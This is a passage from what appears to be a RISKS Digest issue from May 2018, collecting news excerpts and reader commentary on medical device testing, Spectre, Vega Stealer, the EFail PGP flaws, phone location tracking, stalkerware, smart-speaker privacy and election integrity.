    medical implants, cars, cellphones, etc.) often economize on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment is sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an expose' of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind if the deaths
    were attributed to the device or not, find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports where filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets | ZDNet

    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers | ZDNet

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.

    ------------------------------

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets | ZDNet

    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges make it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/

    ------------------------------

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    T-Mobile security lapse let anyone see customer account details

    T-Mobile bug let anyone see any customer's account details Exclusive: The
    exposed lookup tool let anyone run a customer's phone number -- and obtain
    their home address and account PIN, used to contact phone support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker om 17 May
    on the same subject:
    A bug in cell phone tracking firm's website leaked millions of Americans' real-time locations
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zach Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    Police can track any phone in the US in seconds — without a warrant

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times& revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zach Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    US cell carriers are selling access to your real-time phone location data

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    Hundreds of Apps Can Empower Stalkers to Track Their Victims

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    Hacks turn Amazon Alexa and Google Home into secret eavesdroppers

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise new two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    So, Umm, Google Duplex's Chatter Is Not Quite Human

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

    [Thanks to Phil Porras]
    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
    ...."Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
    counted and would be flushed away as soon as they cast their ballot. Some
    angrily accused me to trying to take away their precious right to vote, for
    which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
